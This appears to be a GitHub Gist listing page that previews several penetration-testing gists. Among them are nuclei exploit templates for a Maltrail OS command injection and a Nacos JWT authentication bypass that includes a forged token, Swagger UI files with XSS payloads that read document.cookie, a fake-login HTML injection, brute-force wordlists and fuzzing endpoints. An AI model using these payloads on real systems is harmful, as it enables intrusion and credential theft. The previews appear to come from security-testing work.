win3zz
/ zendesk_endpoints.txt
Created
July 18, 2023 09:01
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/v2/accounts | |
| GET /api/v2/activities?since=cstest | |
| GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest | |
| GET /api/v2/automations | |
| POST /api/v2/automations | |
| GET /api/v2/bookmarks | |
| POST /api/v2/bookmarks | |
| GET /api/v2/brands | |
| POST /api/v2/brands | |
| GET /api/v2/custom_objects |
Esonhugh
/ maltrail-command-injection.nuclei.yaml
Created
July 10, 2023 17:28
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: maltrail-os-command-injection | |
| info: | |
| author: Esonhugh | |
| name: Unauthenticated OS Command Injection in stamparm/maltrail | |
| severity: critical | |
| description: | | |
| Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process. | |
| reference: | |
| - "https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/" |
Esonhugh
/ nacos_bypass_nuclei_template.yaml
Last active
December 18, 2023 06:50
nacos default jwt secret encryption vuln nuclei poc leaking all passwords and create user automatically exploit.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: nacos-bypass-authentication | |
| variables: | |
| #token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.vqhkMLKmquQ6R5AD6VWrTOqgClC599nnAQgQLHhPcLc | |
| # token is signed with a very long time expire. | |
| # token exp -1 | |
| token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6LTF9.ybUomrBRXZhbUMWVgXRz3Q6zndbF-Zdk4RGpCnV-Ofs | |
| info: | |
| name: Nacos Bypass Auth with default jwt secret |
jhaddix
/ reconftw.cfg
Last active
September 24, 2025 23:27
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################################# | |
| # reconFTW config file # | |
| ################################################################# | |
| # General values | |
| tools=~/Tools # Path installed tools | |
| SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path | |
| profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile | |
| reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version | |
| generate_resolvers=false # Generate custom resolvers with dnsvalidator |
Sachinart
/ common.txt
Last active
September 26, 2025 04:45
custom wordlist common.txt for bruteforce path or directory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.env | |
| /phpinfo.php | |
| /info.php | |
| /admin.php | |
| /api/apidocs | |
| /apidocs | |
| /api | |
| /api/v2 | |
| /api/v1 | |
| /api/v3 |
zenelite123
/ xss.json
Created
January 13, 2023 15:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml", | |
| "name": "Foo" | |
| } | |
| ] | |
| } |
zenelite123
/ xss.yaml
Created
January 13, 2023 15:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| securityDefinitions: | |
| a: | |
| type: oauth2 | |
| authorizationUrl: javascript:alert(document.domain)// | |
| info: | |
| version: "0.0.1" | |
| title: DOM XSS PoC | |
| description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">' | |
| termsOfService: "javascript:alert(document.cookie)" |
zenelite123
/ test.json
Created
January 13, 2023 05:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml", | |
| "name": "Test" | |
| } | |
| ] | |
| } |
zenelite123
/ test.yaml
Created
January 13, 2023 05:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| version: 1.0.0 | |
| title: Fake Login Page | |
| description: '<div class="login-form"> | |
| <div class="heading"> | |
| <h1>HTML Injection : Fake Login</h1> | |
| </div> | |
| <div class="form-container"> | |
| <form action="https://example.com/login" method="post" class="form-signin"> |
nullenc0de
/ aodirb.py
Created
November 21, 2022 15:17
pip3 install asyncio and pip3 install import aiohttp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import asyncio | |
| import aiohttp | |
| import time | |
| import sys | |
| import argparse | |
| import os | |
| parser = argparse.ArgumentParser(description='Directory Bruteforce') | |
| parser.add_argument('-u', '--url', help='URL to bruteforce', required=True) | |
| parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True) |